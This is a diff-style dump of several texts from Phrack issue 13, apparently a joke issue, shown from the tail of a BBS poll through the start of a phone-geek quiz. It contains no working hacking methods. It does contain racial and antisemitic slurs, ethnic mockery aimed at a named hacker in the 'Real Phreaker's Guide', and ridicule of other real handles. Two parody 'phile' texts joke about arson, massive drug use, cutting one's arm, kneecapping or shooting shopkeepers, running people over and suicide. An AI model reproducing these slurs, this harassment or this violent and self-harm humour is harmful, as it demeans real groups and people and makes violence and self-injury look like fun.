||||
6:No. : 0 0.0%
|
||||
7:No. : 0 0.0%
|
||||
8:No. : 0 0.0%
|
||||
9:No. : 1 16.7%
|
||||
|
||||
Your vote: No Comment
|
||||
Change it? Yes
|
||||
|
||||
Which number (0-9) ? 1
|
||||
|
||||
Current Standings: Should Oryan Quest be let back on?
|
||||
Users voting: 10.1%
|
||||
|
||||
1:No. : 4 57.1%
|
||||
2:No. : 1 14.3%
|
||||
3:No. : 0 0.0%
|
||||
4:No. : 1 14.3%
|
||||
5:No. : 0 0.0%
|
||||
6:No. : 0 0.0%
|
||||
7:No. : 0 0.0%
|
||||
8:No. : 0 0.0%
|
||||
9:No. : 1 14.3%
|
||||
|
||||
|
||||
Majority of Posts Taken From Metal Shop Private
|
||||
Some Posts Taken From The Lost City Of Atlantis
|
||||
_______________________________________________________________________________
|
||||
|
129
phrack13/2.txt
Normal file
129
phrack13/2.txt
Normal file
|
@ -0,0 +1,129 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #2 of 10
|
||||
|
||||
_-><-_==_{[The REAL Phreaker's Guide Part II]}_==_-><-_
|
||||
or
|
||||
How To/Not To Be Elite!
|
||||
|
||||
Written by
|
||||
|
||||
Taran King and Knight Lightning
|
||||
|
||||
So, you're willing to give up EVERYTHING to be elite, huh? Well,
|
||||
you've come to the right place. We know from EXPERIENCE. We know FIRST HAND.
|
||||
We know because we ARE ELITE (not elite, ELITE).
|
||||
Some of you may recall our first version of this file which was
|
||||
released years ago. That was when we were young and immature. We are now
|
||||
much more mature and ELITE and you aren't so there. Here's the file, learn
|
||||
it, love it, live it, leach it.
|
||||
|
||||
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
|
||||
|
||||
Real phreaks don't utilize anything pertaining to phreaking/hacking in their
|
||||
handles (Phantom PHREAKER, CODES Master, CODE Manipulator, Bill from RNOC,
|
||||
Perpetual PHREAK, Luke VAXHACKER, VMS Consultant, Holophax PHREAKER,
|
||||
Ubiquitous HACKER, Dr. HACK, PHREAKY Floyd, Broadway HACKER, The Mad HACKER,
|
||||
The PHREAKazoid, PHREAKenstein, Dan The OPERATOR, and ORYAN QUEST).
|
||||
|
||||
Corollary: Real phreaks or hackers don't have ORYAN QUEST in their name.
|
||||
|
||||
Real phreaks don't get in trouble when people harass their parents (Phucked
|
||||
Agent 04, The Executioner, and Oryan Quest).
|
||||
|
||||
Corollary: Real phreaks don't name themselves Oryan Quest if they know that
|
||||
they're going to receive harassing phone calls.
|
||||
|
||||
Real phreaks don't look like celebrities (Mark Tabas - Tom Petty, Shooting
|
||||
Shark - Mork from Ork, Telenet Bob - Danny Partridge (200 pounds later), John
|
||||
Draper - Marty Feldman in Young Frankenstein, The Executioner - All of the
|
||||
group members of Loudness, Broadway Hacker/The Whacko Cracko Bros. - Tommy
|
||||
Flenagan, Mr. Zenith's mother - Fred Sanford, The Lineman - Spanky, Sigmund
|
||||
Fraud - The Great Pumpkin, and Oryan Quest - the Mexican cab driver in D.C.
|
||||
Cab).
|
||||
|
||||
Corollary: Real phreaks didn't crawl under a fence to become a citizen of the
|
||||
United States of America.
|
||||
|
||||
Real phreaks don't go to Tap (Dead Lord, Cheshire Catalyst, Sid Platt, and
|
||||
Oryan Quest).
|
||||
|
||||
Corollary: Real phreaks don't piss Taran King off so that they would get a
|
||||
rag file dedicated to them.
|
||||
|
||||
Real phreaks don't name their group after a real phreak (New religion:
|
||||
Luthorian.)
|
||||
|
||||
Real phreaks don't get busted and come back numerous times (The Whacko Cracko
|
||||
Bros., Dr. Who, Mark Tabas, Holophax Phreaker, and Oryan Quest).
|
||||
|
||||
Real phreaks don't get kicked out of the FBI (Ahem!).
|
||||
|
||||
Real phreaks can't speak 2600 in their normal, everyday voice (Ax Murderer,
|
||||
The Wizard, The Preacher, and Oryan Quest).
|
||||
|
||||
Real phreaks don't have busha-bushas (Eric Corley, John Maxfield, The Bootleg,
|
||||
and not Oryan Quest's mother).
|
||||
|
||||
Real phreaks aren't religious fanatics (The Preacher, The Pope, The Exorcist,
|
||||
Magnetic Pope, All Members of Cult of the Dead Cow, Mr. Zenith's mom, The
|
||||
Prophet, Lucifer 666, Angel of Destiny, and Satan [Oh, and Oryan Quest]).
|
||||
|
||||
Real phreaks don't use vaseline for mousse (Oryan Quest).
|
||||
|
||||
Real phreaks don't eat tacos for breakfast, burritos for lunch, and
|
||||
enchilladas for dinner (Oryan Quest).
|
||||
|
||||
Corollary: Real phreaks don't need to get the cheese for their Mexican dinner
|
||||
from the government (Oryan Quest).
|
||||
|
||||
Real phreaks don't claim to get busted 3 times to make a good reputation as a
|
||||
phreaker or hacker for themselves (Oryan Quest).
|
||||
|
||||
Real phreaks don't answer to "Paco" (Oryan Quest).
|
||||
|
||||
Real phreaks don't use Maintenance Busy in an effort to unleash with full
|
||||
force (Oryan Quest).
|
||||
|
||||
Real phreaks can rag on better things than an individual's mom (Oryan Quest).
|
||||
|
||||
Real phreaks' caps lock didn't get stuck when signing their first message
|
||||
after they typed their first name (Oryan QUEST).
|
||||
|
||||
Real phreaks don't claim to know more than 65% of the phreak world (Oryan
|
||||
Quest).
|
||||
|
||||
Real phreaks don't have a girlfriend that needs to shave...their face (Oryan
|
||||
Quest).
|
||||
|
||||
Real phreaks haven't been around for 4 years without accomplishing something
|
||||
(Oryan Quest).
|
||||
|
||||
Real phreaks CAN'T argue with their parents in Spanish (Oryan Quest).
|
||||
|
||||
Real phreaks don't:
|
||||
|
||||
Cash $5,000,000 checks.
|
||||
|
||||
Card minicomputers.
|
||||
|
||||
Card gold.
|
||||
|
||||
Get busted for hacking but let off due to police brutality (?!?).
|
||||
|
||||
Write books on the topic.
|
||||
|
||||
Say they're from outside of Illinois when working for Illinois Bell.
|
||||
|
||||
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
|
||||
|
||||
You, the reader, must understand that this is all written with the
|
||||
very least in seriousness (except that written about Oryan Quest). Anything
|
||||
contained in the file is just poking fun at people without trying to really
|
||||
make them feel bad (except for Oryan Quest).
|
||||
To the various people that have contributed various pieces and bits
|
||||
to this file, we wish to extend great thanks for your innovativeness (or lack
|
||||
thereof).
|
||||
Now, you too, can be ELITE.
|
||||
|
||||
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
|
139
phrack13/3.txt
Normal file
139
phrack13/3.txt
Normal file
|
@ -0,0 +1,139 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #3 of 10
|
||||
|
||||
/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
|
||||
\|/ How to fuck up the world \|/
|
||||
/|\ Writen 10:03 pm December 2nd 1986 /|\
|
||||
\|/ by the Neon Knights and Metal Communications \|/
|
||||
/|\ Thanx to the Metallain,Zandar Zan,Marlbro Reds,ACID,The High Lord /|\
|
||||
\|/ Satan,Apple Maniac,The Necrophiliac&The Necrophobic (for theri awesome\|/
|
||||
/|\ dox-file skils),SLayer,Megadeth,Overkill,Samhain,The Misfits (fuck yea/|\
|
||||
\|/ Hi Glenn!),The Blade,Killer Kurt,and Steve Wozniak even thouhg hes a \|/
|
||||
/|\ wimp! /|\
|
||||
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
|
||||
/|\ Fuck off all niggers jews commusnists retarted /|\
|
||||
\|/ arabians peopel who dont own computers and any welfare starving shit \|/
|
||||
/|\ headed bastard who doesnt have an Applecat modem! /|\
|
||||
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
|
||||
/|\ Im not even going to write a list of boards for you to call. Well /|\
|
||||
\|/ what the fuck I guess I will put at least one..... \|/
|
||||
/|\ Call the Metal AE (201)-(879)-(666)-(8) for the latest in Neon /|\
|
||||
\|/ Knights wares and for a cool board/cool sysop/cool wares/just all \|/
|
||||
/|\ around cool! /|\
|
||||
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
|
||||
|
||||
The Phile itself:
|
||||
|
||||
When your like me and get bored eassily its veryt hard to keep fuctiong the way
|
||||
your parents expet you to. I would go out with Killer Kurt all the time and dest
|
||||
roy evrything we coiuld find that looked stupid,get drunk off my ass,trip on aci
|
||||
d(like im doing righ now),use the necronimiconm to summon a watcher to kill my t
|
||||
eachewrs my douchbag bratty sister and the fat sickining son of a bitch that liv
|
||||
es next door to me,and my parents would very rarely do anything to try to stop m
|
||||
e. i gues they just thought i was goin throuhg a phase or sometihg like that. We
|
||||
ll I finalyl hit upon the perfect combination of things to do that not only get
|
||||
your parents to reac, the are a hell of a lot of fun and cause so much evil, cha
|
||||
os, and havoc that Satan will be sure to reservbe a good seat in Hell for you. S
|
||||
o now Here are step by stpe instructins on HOW TO FUCK UP THE WORLD
|
||||
|
||||
Step one:Get.a large supply fo plastics garbage bags, gas or other very flammabl
|
||||
le shit,and a flamsthrower or somet other way to light fires from a distance (ju
|
||||
st to make sure you dont die yourself before your ready).Also i forgot to mentio
|
||||
n,take a good amount of drugs befoere you start doin this so youll be able to fi
|
||||
nish what you start.I reccommend about three hits of blotter acid (4way album co
|
||||
ver is best,thats what i use),about 2 grams of weed (smoked),some mescaline if y
|
||||
ou can get it (arizona is a great place to pick it yourself),and of course the g
|
||||
ood old american tradition of JACK DANIELS. Most people mix this with coke but I
|
||||
have invented a new way to do it,which ya do by mixing it with JOLT cola instead
|
||||
. tHIS (godamn fuckin caps lock key) will get you really goin, you may want to
|
||||
use some speed as well so you dont pass out and some ludes or other type of down
|
||||
er just to keep you balancd well. now make sure you can still stand up (once you
|
||||
get that far the rest will come naturaly) and get in yer pickup (if you dont hav
|
||||
e a pickup there is no hope for ya!) and drive. Oh remember to take the gas, bag
|
||||
s, and light with you.
|
||||
|
||||
Step two: Drive to a secluded area and preparew for your assault on the armies o
|
||||
f the conformist bastards. What your gonna be doin here is summoning a demon. Th
|
||||
is is one of the waeker types according to the Necromnicon so you can control it
|
||||
easily in your druged state but powerful enouhg to actually be of use to ya. So
|
||||
draw yer pentagram on the ground,get a Slayer tapepl aying (no motley crue!!! or
|
||||
the demon will laugh its ass off at you before killing you and eating your soul.
|
||||
Adn thats a big waste of time not to mention no fun at all.) set candles at all
|
||||
cardinal points and cut a long incision down the lenght of your arm about frmo
|
||||
mid-bicep to just before your wrist as you dont want to bleed to death,just enou
|
||||
gh to get about 3/4 of a pint or so. Drip all this blood inside the pent.,and ch
|
||||
ant the following:
|
||||
"YOGGIH PPEDRILS, STOWART EHNTAHL SHILGLI DRAGGULS UOHT!"
|
||||
Say this5 times and you shoukld noteice the candles flikckering (hmm i blieve th
|
||||
e rrUSH is starting to come on nwo, this sucker relly was worht 40 a sheet!!)! B
|
||||
y the way that shit up there that ya say is not nay kind of backjwards bullshit,
|
||||
it is the real stuff. I paid 40 bux for my copy of the youknowwhat so i oughtta
|
||||
know. now where was i o yeah. Onece the damn thing appears thjen you gotta estab
|
||||
lish control over it real qiock before it start getting any ideas. by the way in
|
||||
caser you wodering what it will look like it is a big motherfucker approx. 20 fe
|
||||
eet tall with green leathery sking. If you get the wrong one it doesnt really ma
|
||||
tter that much anywayt since youll be dyin soon but it helps. so now get it to f
|
||||
ly along above yer truck (tell it to be invisible so ya dont have peopl starin a
|
||||
t ya!) and drive back to whereever it is that your gonna destroy.
|
||||
|
||||
Step three: stop back at yer house wreal quick and pick up the follwng. If you d
|
||||
ont have all this at house then just go by a hardware storte and a drugstore and
|
||||
picjk it up. if the owner objkects then just take out his kneecaps with your cro
|
||||
wbar and he wont be goin anywhere for a long time.
|
||||
30 dozen hammers
|
||||
50 gallons of paint (asorted colors is nice but not necesary)
|
||||
(jesus this is weird, have any of you ever seen ther letters on yer screen wiggl
|
||||
ing and boucing didnt think so!!) now where was i/
|
||||
5-10 tanks of propane
|
||||
100+ gallons of gas (for a seperate use than the gas i alreadyu mentiond)
|
||||
|
||||
from the drugstore,or your closet if your like me and keep a constant supply of
|
||||
every kind of drug ever made):
|
||||
1,000 doses of pseudoephedrine (there we go,i spelled it right! well ive got the
|
||||
catalog next to me so fuck it anyway,it doesnt mean shit.neuither does your mama
|
||||
. i think im getting off track - wel then again it is kind og amazing cause my
|
||||
ingers are twichin so bad)
|
||||
5,000 doses of LSD
|
||||
250 doses of qualudes
|
||||
600 cases of JACK DANIELS
|
||||
|
||||
ok now for the good part. Consume all of these yourself! HAAHAHA! i bet you thou
|
||||
ght you were suposed to put them in the citys water supply or soething! but now
|
||||
you better get moving cause this is all gonna take effect within the hour! but i
|
||||
f ya wanna save some to put in the citywater then go ahead,you wont have quite a
|
||||
s much fun but who the fuck am i to tell you exactly how to do things.
|
||||
|
||||
Step four: Drive to the heart of the city. on the way see how many little old la
|
||||
dies and fag poodles ya can hit. When ya get to the talest building in town smas
|
||||
h into a fire hydrant in front of it. now get out and run like a bitch *just hav
|
||||
e the demon carry all the shit for ya*! and go to the FUCKEN TOP of the building
|
||||
. here is where you do all this.
|
||||
Make the demon inhale all the propane, and give him the smaler amount of gas (th
|
||||
e one I talked about first..go back about 70 lins or so./) to drionk. Now hes al
|
||||
l set. now YOU have to get on his back. make him carry the hammers and paint and
|
||||
the largetr amount of gas. Have him take off and fly all over the city aas he fl
|
||||
ys just throw hammers down at building windows and people and paint at both of t
|
||||
hose too! Now i bet you thinking i forgot all about those garbage bags and the f
|
||||
lamethrowr. Hell no i didnt! with the little bit of propane hes got left have hi
|
||||
m blow up the bags so they make a giant baloon. now you take the big amount of g
|
||||
as and drink it (after all those other drugs it should be a smnap!) and jump. Wi
|
||||
th your weight off him and all that propane in him and with that baloon he will
|
||||
instantly take off straight up into heaven, where he will cause some wicked shit
|
||||
to happen! As for you, you will fly down and hit the ground, and be goin so fast
|
||||
that you go right through all the way to Hell. Once you get there all the gas in
|
||||
you will ingite and BOOM! Satan will be proud of you for sure! a perfect ending
|
||||
to a perfect day!
|
||||
|
||||
/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
|
||||
\|/ Keep those credits up there excatly as they are (inother words,puttin\|/
|
||||
/|\ your K-K00l board up there WONT be tolerated!) or we will fuck you up. /|\
|
||||
\|/ If ya dont believe us by now your retarted. -Killer Kurt \|/
|
||||
/|\ -And the rest of the 'knights! /|\
|
||||
\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\
|
||||
/|\ Copywrit 1986 by Neon Knights/Metal Communications/ /|\
|
||||
\|/ Black Death/No Love \|/
|
||||
/|\ We're rad...we kill children! /|\
|
||||
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
|
||||
|
||||
Oh, and by the way, the above file was a parody by UrLord, Thomas Covenant.
|
133
phrack13/4.txt
Normal file
133
phrack13/4.txt
Normal file
|
@ -0,0 +1,133 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #4 of 10
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
/|\ the Neon Fucken Knights /|\
|
||||
\|/ present with no alternative \|/
|
||||
/|\HOW TO BUILD A PAISLEY BOX! /|\
|
||||
\|/ by the fucked up Blade \|/
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
All right, so i mfucken in 40 cols..what's it matter? i just
|
||||
realized that many idoits out ther still dont know how to make one of
|
||||
the greatest anarchiust tools ever, the Paisley Box. This little
|
||||
beauty will do just about anuyt6hing ya want, including:
|
||||
--Seize operator lines
|
||||
--Remote control over all TSPS and TOPS consols
|
||||
--All other box functions combind in oine, includin blue, beige, and
|
||||
blotto
|
||||
|
||||
so ya wanna know how to build this fucker and go out terrorizin ma
|
||||
bell..well sit tight, we wont bother with any fucken diagrams cause
|
||||
those are for dweebs (right necro? right!) here we go!
|
||||
|
||||
first of all get about 20 lbs of quality drugs and 3 or 4 kegs. you
|
||||
might
|
||||
think that you need this for the contruction of the box but, you don't
|
||||
you take it all yerself!!
|
||||
this will mellow ya out enuf to follow our planz. lessee, oh yea
|
||||
parts list:
|
||||
--about 50 ffeet of copper wier, hopfully insulated
|
||||
--an old (prefer touchton) phone that ya dont need no more
|
||||
--a honda genorateer (don't pay for it, just card it. right necro?
|
||||
right!)
|
||||
--and one of the empty kegs that ya drank to put it all in. the
|
||||
genarater will fit fine and the rest ya can attach to the outsid if
|
||||
thats your fucken urge.
|
||||
|
||||
now for tha actualy construciton details:
|
||||
|
||||
oh shit, we forgot one fuckin thing. go to you local hadware stoer and
|
||||
find the guy who owns it, get a gun and blow his fuckin head off (you
|
||||
can card the gun two) this isn't for the box but, it fun and it will
|
||||
make satan happy so yor box will work better.
|
||||
|
||||
now with the empty keg and all the stuf we put up there ( i think
|
||||
about 20 lins ofr so up )_ attach the genarater to all the other shit
|
||||
however ya please, now get some nice paisley wallpaper from your mom
|
||||
9(steal it if she wants it still) and put it all on the oputsid of teh
|
||||
keg. you now have a 100% genuine Neon Knights approvd Paisley Box!
|
||||
|
||||
How touse:
|
||||
|
||||
hook that son of a bithc up to yir modem (thats only if you got a 212
|
||||
cat. if you don't then you are an asshole anyway and the box will
|
||||
blow you fucken house aprt but, satan will be happy.)
|
||||
|
||||
now turn yer dam computer on, and when the prkmpt comes up(
|
||||
hardwird into the box of cors! whatdday think we are, stupid? )
|
||||
type: 666 (space) SATAN RULES (space) MY SWEET SATAN!
|
||||
|
||||
then the menu will coume up on you screen and it will say.
|
||||
|
||||
1) fuck the operator around
|
||||
2) take control of the pentagon
|
||||
3) imitatte boxes (blue, blotto)
|
||||
4) fuck-a-geek
|
||||
|
||||
choose whatever ya want, except if ya get tired of it and want to
|
||||
trash th thing type 666 for a choice. the box will sef destructt, yer
|
||||
computer will explod, anmd in its trahsing death throes speak an
|
||||
chant taht will summon satan to take you away to the depths of
|
||||
HELL!!!
|
||||
|
||||
use this masterpece proerly, and remember: NO FUCKEN LOSERS!
|
||||
|
||||
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
|
||||
|
||||
Call these genocidal systemz:
|
||||
|
||||
The Gatest of Hell 555-51325-634637-3
|
||||
1200 ONLY DAMMIT!
|
||||
Mephisto's Suicidal Nightmare 2436-234-666 (of course!)
|
||||
1200 ONLY DAMMIT!
|
||||
The Dead Fuckers Realm 2436-99-2309
|
||||
300 only for now (dammit!)
|
||||
|
||||
sorry for the sloppy look compared to our usual k00l neat files, but my
|
||||
computer got confiscate d by the fucke n pigs so i have to
|
||||
telerwit this fucker usin a dumb terminal, until i card another!
|
||||
should be within the week!
|
||||
|
||||
but don't forget to call the rad Metal AE
|
||||
201-879-[666]8 9600 baud only (god fuckin dammit) 4 drives with 710
|
||||
megs soon (we promise this time).
|
||||
Kneon Nights "We're Rad, we kill children!!"
|
||||
|
||||
|
||||
end of file
|
||||
|
||||
|
||||
|
||||
i said end of file dammit!
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
what are you still fucken readin for? hit escape you stupid
|
||||
shithead!
|
||||
|
||||
|
||||
if you dont fucken hit escape i will call satan on you!!!
|
||||
|
||||
fuck the dead!
|
||||
|
||||
***
|
||||
***
|
||||
***
|
||||
***
|
||||
***********
|
||||
***********
|
||||
***
|
||||
***
|
||||
|
||||
Oral roberts is the anti-christ!!!
|
||||
|
||||
oh and remember: this has been a fucken parody from thomas fucken
|
||||
covenant and double fucken helix. Call Thieve's World, the last
|
||||
bastion of free thought: 616-344-2718.
|
||||
|
||||
"Whaddya mean I don't believe in God? ... I talk to him every day!"
|
128
phrack13/5.txt
Normal file
128
phrack13/5.txt
Normal file
|
@ -0,0 +1,128 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #5 of 10
|
||||
|
||||
Phreaks In Verse!
|
||||
-----------------
|
||||
|
||||
By
|
||||
|
||||
Sir Francis Drake And Aiken Drum
|
||||
|
||||
|
||||
Welcome to this file,
|
||||
We hope you will spend a while,
|
||||
With us today.
|
||||
Perhaps you will be enlightened, in a way.
|
||||
|
||||
This file is about phreaks,
|
||||
And hacks. We have spent weeks
|
||||
writing about people in verse.
|
||||
You can pick who is worse,
|
||||
Our poetry or them.
|
||||
|
||||
We mean no insult,
|
||||
And we hope as a result
|
||||
No on will kill us.
|
||||
'Cause we wouldn't like that OK?
|
||||
|
||||
|
||||
Shooting Shark
|
||||
--------------
|
||||
|
||||
His name is Shark,
|
||||
He thinks UNIX is a lark.
|
||||
He can even log people out!
|
||||
(The legality of this we doubt)
|
||||
He looks like Robin Williams.
|
||||
And maby he'll make millions
|
||||
Writing UNIX software!
|
||||
(Wolf will tell him what to wear.)
|
||||
|
||||
|
||||
Oryan QUEST (Agent Orange)
|
||||
--------------------------
|
||||
|
||||
Oh! Poor Oryan QUEST!
|
||||
Many call him a pest.
|
||||
"Stan", they cry,
|
||||
"Why do you lie?"
|
||||
The color of his car keeps changing,
|
||||
Perhaps its because I'm aging,
|
||||
But even if my brain is weak
|
||||
I know he said his car was RED last week,
|
||||
But today he said BLUE!
|
||||
Tell me the truth Stan, please do.
|
||||
But he knows quite a bit,
|
||||
And if he dosn't throw a fit,
|
||||
He can be an OK guy.
|
||||
|
||||
Lex Luthor
|
||||
----------
|
||||
|
||||
His real name is funny,
|
||||
(And it isn't Bunny)
|
||||
But a joke he is not,
|
||||
He knows a hell of alot.
|
||||
Of phreaks, and hacks, and little blue box.
|
||||
Hes head of LODH, a club that rocks.
|
||||
He's a secretive guy,
|
||||
But I think we all know why.
|
||||
(He even made me change this poem,
|
||||
Oh well. I owed him.)
|
||||
And no he dosn't sound like Yogi Bear
|
||||
No matter what Bill may dare
|
||||
to say.
|
||||
|
||||
Knight Lightning
|
||||
----------------
|
||||
|
||||
Knight Lighting likes dots, *'s, and slashes.
|
||||
He sits at the CRT so long he gets rashes.
|
||||
Making those NEAT title screens
|
||||
Is the thrill of his teens!
|
||||
But we all think he's a swell guy,
|
||||
'Cause he gives everything a try.
|
||||
|
||||
Silver Spy
|
||||
----------
|
||||
|
||||
Silver Spy!
|
||||
He's a conservative guy.
|
||||
He runs a elite BBS-- Catch-22.
|
||||
It dosn't get many posts, boo-hoo.
|
||||
But what other board can you see,
|
||||
Limericks when you log on...tee-hee.
|
||||
|
||||
Bill From RNOC
|
||||
--------------
|
||||
|
||||
Bill from RNOC
|
||||
Is from New Yawrk.
|
||||
Smarter than the average phreak,
|
||||
His opinions are not meak.
|
||||
He designs PBX's for fun,
|
||||
But he needs to spend more time in the sun.
|
||||
Soon you will see,
|
||||
Bill working for NT. (*NT is Northern Telecom for you stupid people*)
|
||||
|
||||
Taran King
|
||||
----------
|
||||
|
||||
What a terrific guy is Taran King,
|
||||
Working on Phrack and runing MSP is his thing.
|
||||
He's a bit redneckish;
|
||||
(he won't admit he has a homosexual fetish.)
|
||||
But of the phreak community he is a piller,
|
||||
And without him we would wither.
|
||||
And if I keep patting his back,
|
||||
Maby he'll put this file in Prack.
|
||||
|
||||
----------
|
||||
|
||||
Oh no! I fear
|
||||
The end of the file is here.
|
||||
This file, about all these people who are ELITE,
|
||||
Can be followed by one word...DELETE.
|
||||
|
||||
sfd
|
110
phrack13/6.txt
Normal file
110
phrack13/6.txt
Normal file
|
@ -0,0 +1,110 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #6 of 10
|
||||
|
||||
R.A.G.
|
||||
|
||||
|
||||
Rodents Are Gay
|
||||
|
||||
|
||||
Starring Codes Master
|
||||
|
||||
|
||||
Welcome to the first and last issue of R.A.G. This month we will feature a
|
||||
nauseating article about this months feature idiot - Codes Master. Remember,
|
||||
this file is not for you people with weak stomachs and parental discretion
|
||||
is advised. Rated R (for rodent).
|
||||
|
||||
|
||||
|
||||
First, a little introduction. The purpose of R.A.G. is to seek out and
|
||||
destroy potential idiots, assholes and posers. Obviously Codes fits into all
|
||||
these catagorys. We obtained a taped interview with Codes at his home in
|
||||
Mickey, Mississipi, and was able to get a few truths revealed. Here is a
|
||||
small transcript of the interview. "ME" is the interviewer, "HIM" is Codes.
|
||||
|
||||
|
||||
|
||||
ME: Nice place you have here. I see your into art. Ah, thats an interesting
|
||||
peice there. What do you call it?
|
||||
HIM: Thanks. Thats called, "Mickey's Rat Trap". It shows the valiant Mickey
|
||||
cleverly stealing the cheese from the trap without setting it off.
|
||||
Actually, it was quite a bargain, and cost me mere $250.
|
||||
ME: Thats interesting. You seem to have an obsession with Mickey Mouse and
|
||||
other rodents (looking around I see portraits of Mighty Mouse, Jerry,
|
||||
Speedy and others).
|
||||
HIM: Its just one of my hobbys.
|
||||
ME: Okay, anyway, on with the interview. We understand that you consider
|
||||
yourself, and I quote, "an expert on Primos". But we have seen
|
||||
conflicting views when it comes to the truth of this. Alot of people
|
||||
seem to think you don't know anything, and what you do know has been
|
||||
learned in a very short period of time. Is there any truth to this?
|
||||
HIM: Uh, would you like something to drink? Some treats perhaps? I have
|
||||
some excellent chees......
|
||||
ME: No thank you. Back to the question, are you really a Prime expert?
|
||||
HIM: Well, I, uh...I guess you could say that. Have you ever read my Prime...
|
||||
ME: No I havent. Sources tell me that you have claimed you had system access
|
||||
on the Henco Prime on Telenet. But my sources know for a fact that you
|
||||
haven't. Is there any truth to this?
|
||||
HIM: Well, no...
|
||||
ME: Thats what I thought. Also, I would like to bring up the little war
|
||||
between you and Evil Jay. You have claimed that the reason you didn't
|
||||
see eye-to-eye was because both of you were working on seperate versions.
|
||||
Yet, we both know that aside from versions lower than 19 there are
|
||||
not too many changes so we really dont understand your comment.
|
||||
HIM: What kind of interview is...
|
||||
ME: We also understand that you posted a message on Phantasie Realm that
|
||||
contained the, and I quote, "new 617 Cosmos dialups". Yet these dialups
|
||||
have been around for years and died more than a month before your post.
|
||||
Any comments, Codes?
|
||||
HIM: I....
|
||||
ME: Okay, how about your "Real Hackers, Phreakers and Trashers Guide".
|
||||
You made some interesting comments on there, such as, "Real phreaks are
|
||||
mostly pirates" and "Real phreaks dont have handles like Mr Phreak".
|
||||
You obviously didn't take a look at your own handle, but we will skip
|
||||
that little misunderstanding. The thing we find curious about the file
|
||||
was that it was written in January of this year (1987). At this time, you
|
||||
were a member on some respectful systems, such as Shadowspawn. What we
|
||||
cant understand is why a phreak, who is on some pretty good boards, would
|
||||
write such a rodentish file. Comments?
|
||||
HIM: You know how I feel about rodents. (HE glances fondly at Mickey portrait)
|
||||
ME: I see. How long have you been hacking a phreaking?
|
||||
HIM: Uh, about a year or les...
|
||||
ME: I see. Is it true you were an infamous TMC code poster last summer,
|
||||
sometimes posting up to 30 TMC codes per message, but never anything else?
|
||||
HIM: HEY, NOW WAI...
|
||||
ME: I see. Isn't it true that the majority of your posts since you have been
|
||||
accepted on some major boards, have been advertisments for your somewhat
|
||||
faulty Prime hacking files?
|
||||
HIM: You have to advertise nowadays to get any recognition for anything.
|
||||
You know?1
|
||||
ME: Well, isn't that special. We got a chance to see your application to
|
||||
Atlantis, and noticed that you said you had experience with Vax/VMS, RSTS
|
||||
and some other operating systems. But close sources who know you well
|
||||
tell us this is a lie, and if you did know anything its probably how to
|
||||
get a directory, chat with a user and other general crap. Is this true?
|
||||
HIM: WHAT THE HELL KIND OF INTERV...
|
||||
ME: Well thats about it for today. Thanks alot Codes Master. May the force
|
||||
be with you.
|
||||
HIM: WAIT A...(He starts to grab the interviewer...to Codes amazement, a mask
|
||||
falls off and...)
|
||||
HIM: EVIL JAY?!?!1
|
||||
ME: Thats right! We have you on tape now buddy. Your life is ruined...
|
||||
|
||||
|
||||
|
||||
The rest is to graphically violent to show here. But Jay emerged unscathed
|
||||
to hand us the copy of this interview. Codes was last seen walking towards
|
||||
Katheryn Hamilton Mental Center and had no comment.
|
||||
|
||||
|
||||
So, we have unraveled the mysterys of one of the greatest posers of our
|
||||
time and exposed the man to what he really was all the time. A mouse.
|
||||
A fiendish poser, seeking to infilterate the higher levels of hacking and
|
||||
phreaking, for his own greedy amusement. Everything in this article was
|
||||
true, and we advise sysops to think twice about admitting Codes "Mighty
|
||||
Mouse" Master on your bulletin board system. Thank you and have a nice day.
|
||||
|
||||
|
||||
-Tom
|
177
phrack13/7.txt
Normal file
177
phrack13/7.txt
Normal file
|
@ -0,0 +1,177 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #7 of 10
|
||||
|
||||
ARE YOU A PHONE GEEK???
|
||||
-----------------------
|
||||
|
||||
|
||||
Take this simple test to find out! A word of caution however...This file
|
||||
is not a measurement of your intelligence or sex appeal. Read on at your own
|
||||
risk!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
||||
|
||||
|
||||
Simply answer the following questions completely and truthfully.
|
||||
|
||||
|
||||
1: You are out on a date with an amazing looking chick. You are at a drive
|
||||
in and notice that she is getting rather hot. She wraps her arms around you
|
||||
and lets you know she means business by her passionate pelvic thrusts. However,
|
||||
you lose concentration when you notice a Bell truck has pulled in next to you,
|
||||
and the driver is asleep (boring movie). What do you do???
|
||||
|
||||
|
||||
